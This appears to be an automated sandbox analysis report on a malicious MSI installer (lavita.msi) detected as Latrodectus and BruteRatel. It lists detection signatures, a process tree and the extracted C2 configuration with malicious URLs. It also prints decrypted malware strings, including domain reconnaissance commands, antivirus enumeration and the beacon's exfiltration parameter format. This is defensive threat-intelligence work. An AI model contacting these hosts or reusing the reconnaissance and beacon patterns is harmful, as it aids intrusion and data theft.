Windows Analysis Report
lavita.msi

Overview

General Information

Sample name: lavita.msi
Analysis ID: 1576900
MD5: b4d82d17669303be46edbf7b7c5823a2
SHA1: 1d8e902129f1bfba8d349403b5d45a737d1372c3
SHA256: f071f083770fe89d0860ba0cf46eda960d3ccf31639a18dda8954a0c026165d9
Tags: msi, user-pr0xylife
Infos:

Detection

BruteRatel, Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Contains functionality to inject threads in other processes
Contains functionality to steal Internet Explorer form passwords
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Tries to harvest and steal browser information (history, passwords, etc)
Uses ipconfig to lookup or modify the Windows network settings
Uses net.exe to modify the status of services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • msiexec.exe (PID: 3604 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\lavita.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 6656 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 828 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 50018695A6192D85B7480687F9E151A9 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • rundll32.exe (PID: 7024 cmdline: C:/Windows/System32/rundll32.exe appgpuset.dll, GfeXcodeFunc MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmd.exe (PID: 2144 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • ipconfig.exe (PID: 2364 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • cmd.exe (PID: 3804 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • systeminfo.exe (PID: 3660 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
            • WmiPrvSE.exe (PID: 1656 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 4064 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • nltest.exe (PID: 2724 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
        • cmd.exe (PID: 3780 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • nltest.exe (PID: 5272 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
        • cmd.exe (PID: 5280 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 6812 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • cmd.exe (PID: 5244 cmdline: /c net view /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 6736 cmdline: net view /all MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • cmd.exe (PID: 1020 cmdline: /c net group "Domain Admins" /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 5012 cmdline: net group "Domain Admins" /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 6256 cmdline: C:\Windows\system32\net1 group "Domain Admins" /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 3260 cmdline: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 3756 cmdline: /c net config workstation MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 7088 cmdline: net config workstation MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 5232 cmdline: C:\Windows\system32\net1 config workstation MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • cmd.exe (PID: 2788 cmdline: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 1488 cmdline: wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • findstr.exe (PID: 4552 cmdline: findstr /V /B /C:displayName MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • cleanup
Name: Brute Ratel C4, BruteRatel
Description: Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment. This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name: Latrodectus, Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

{"C2 url": ["https://proliforetka.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}
Source | Rule | Description | Author | Strings
00000004.00000003.2394515342.000001DA031BB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |
00000004.00000002.4600031642.000001DA0329C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |
00000004.00000002.4600031642.000001DA0330C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |
00000007.00000002.4606571879.000000000950A000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
00000004.00000002.4597607083.000001DA0318C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |

            System Summary

            Source: Process started, Author: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:/Windows/System32/rundll32.exe appgpuset.dll, GfeXcodeFunc, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7024, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4004, ProcessName: explorer.exe
            Source: Process started, Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net group "Domain Admins" /domain, CommandLine: net group "Domain Admins" /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net group "Domain Admins" /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1020, ParentProcessName: cmd.exe, ProcessCommandLine: net group "Domain Admins" /domain, ProcessId: 5012, ProcessName: net.exe
            Source: Process started, Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5280, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 6812, ProcessName: net.exe
            Source: Process started, Author: Endgame, JHasenbusch (ported for oscd.community): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5280, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 6812, ProcessName: net.exe
            Source: Process started, Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4004, ParentProcessName: explorer.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 2144, ProcessName: cmd.exe

            AV Detection

            Source: https://dogirafer.com/test/8713781_55685573550420_1137939URLS1https://proliforetka.com/test/4803877_, Avira URL Cloud: Label: malware
            Source: https://dogirafer.com/test/876227_481825193277_5070988URLS1https://proliforetka.com/test/6581893_513, Avira URL Cloud: Label: malware
            Source: https://dogirafer.com/test/, Avira URL Cloud: Label: malware
            Source: https://dogirafer.com/test/stkm.binDS&s, Avira URL Cloud: Label: malware
            Source: https://dogirafer.com/test/8085467_13561511323361_4058196URLS1https://proliforetka.com/test/775166_4, Avira URL Cloud: Label: malware
            Source: https://dogirafer.com/test/t/, Avira URL Cloud: Label: malware
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, Malware Configuration Extractor: Latrodectus {"C2 url": ["https://proliforetka.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}
            Source: Submited Sample, Integrated Neural Analysis Model: Matched 99.6% probability
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: /c ipconfig /all
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: /c systeminfo
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: /c nltest /domain_trusts
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: /c net view /all
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: /c nltest /domain_trusts /all_trusts
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: /c net view /all /domain
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &ipconfig=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: /c net group "Domain Admins" /domain
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: C:\Windows\System32\wbem\wmic.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: /c net config workstation
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: /c whoami /groups
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &systeminfo=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &domain_trusts=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &domain_trusts_all=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &net_view_all_domain=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &net_view_all=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &net_group=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &wmic=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &net_config_ws=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &net_wmic_av=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &whoami_group=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: "pid":
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: "%d",
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: "proc":
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: "%s",
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: "subproc": [
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &proclist=[
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: "pid":
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: "%d",
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: "proc":
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: "%s",
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: "subproc": [
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: &desklinks=[
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: *.*
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: "%s"
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: Update_%x
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: Custom_update
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: .dll
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: .exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: Error
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: runnung
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: %s/%s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpack, String decryptor: front
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /files/
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Lambda
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Cookie:
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: POST
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: GET
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: curl/7.88.1
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: CLEARURL
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: URLS
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: COMMAND
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: ERROR
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: aPQLnCcYDT5xeVCxMvCCPmDCealRt4Sb1tyrV5j5ovSSvsA5cZQIJDlIqsBkNLFA
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: [{"data":"
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "}]
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &dpost=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: https://proliforetka.com/test/
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: https://dogirafer.com/test/
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: \*.dll
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: AppData
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Desktop
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Startup
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Personal
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Local AppData
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: <html>
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: <!DOCTYPE
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %s%d.dll
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Content-Length: 0
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Content-Type: application/dns-message
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Content-Type: application/ocsp-request
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: 12345
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &stiller=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %s%d.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %x%x
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &mac=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %02x
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: :%02x
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &computername=%s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &domain=%s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: LogonTrigger
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: \Registry\Machine\
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: TimeTrigger
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: PT0H%02dM
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: PT0S
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: \update_data.dat
            Source: C:\Windows\explorer.exeCode function: 7_2_0B845E5C StrStrIA,StrChrA,CryptUnprotectData,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LocalFree,GetProcessHeap,HeapFree,7_2_0B845E5C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B845FE4 CryptUnprotectData,7_2_0B845FE4
            Source: C:\Windows\explorer.exeCode function: 7_2_0B846078 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptGetProperty,BCryptGenerateSymmetricKey,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,BCryptDecrypt,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,7_2_0B846078
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8E5528 BCryptGetProperty,BCryptSetProperty,BCryptOpenAlgorithmProvider,BCryptCloseAlgorithmProvider,7_2_0B8E5528
            Source: C:\Windows\explorer.exeCode function: 7_2_0B84453C lstrcpyA,lstrcatA,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,lstrcpyW,RegQueryValueExW,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,7_2_0B84453C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B848568 lstrlenW,CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfA,lstrcatA,wsprintfA,lstrcatA,CryptDestroyHash,CryptReleaseContext,RegQueryValueExA,lstrlenW,CryptUnprotectData,LocalFree,7_2_0B848568
            Source: unknownHTTPS traffic detected: 172.67.161.60:443 -> 192.168.2.6:49935 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49959 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49978 version: TLS 1.2
            Source: Binary string: C:\dvs\p4\build\sw\rel\gfclient\rel_03&3!ZxZQ9rbTQA!n8N>7T3de\GfeXCode\win7_amd64_release\GfeXCode64.pdb source: rundll32.exe, 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmp, appgpuset.dll.2.dr
            Source: Binary string: de\GfeXCode\win7_amd64_release\GfeXCode64.pdb source: rundll32.exe, 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmp, appgpuset.dll.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.dr

            Spreading

            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\System32\msiexec.exeFile opened: z:
            Source: C:\Windows\System32\msiexec.exeFile opened: x:
            Source: C:\Windows\System32\msiexec.exeFile opened: v:
            Source: C:\Windows\System32\msiexec.exeFile opened: t:
            Source: C:\Windows\System32\msiexec.exeFile opened: r:
            Source: C:\Windows\System32\msiexec.exeFile opened: p:
            Source: C:\Windows\System32\msiexec.exeFile opened: n:
            Source: C:\Windows\System32\msiexec.exeFile opened: l:
            Source: C:\Windows\System32\msiexec.exeFile opened: j:
            Source: C:\Windows\System32\msiexec.exeFile opened: h:
            Source: C:\Windows\System32\msiexec.exeFile opened: f:
            Source: C:\Windows\System32\msiexec.exeFile opened: b:
            Source: C:\Windows\System32\msiexec.exeFile opened: y:
            Source: C:\Windows\System32\msiexec.exeFile opened: w:
            Source: C:\Windows\System32\msiexec.exeFile opened: u:
            Source: C:\Windows\System32\msiexec.exeFile opened: s:
            Source: C:\Windows\System32\msiexec.exeFile opened: q:
            Source: C:\Windows\System32\msiexec.exeFile opened: o:
            Source: C:\Windows\System32\msiexec.exeFile opened: m:
            Source: C:\Windows\System32\msiexec.exeFile opened: k:
            Source: C:\Windows\System32\msiexec.exeFile opened: i:
            Source: C:\Windows\System32\msiexec.exeFile opened: g:
            Source: C:\Windows\System32\msiexec.exeFile opened: e:
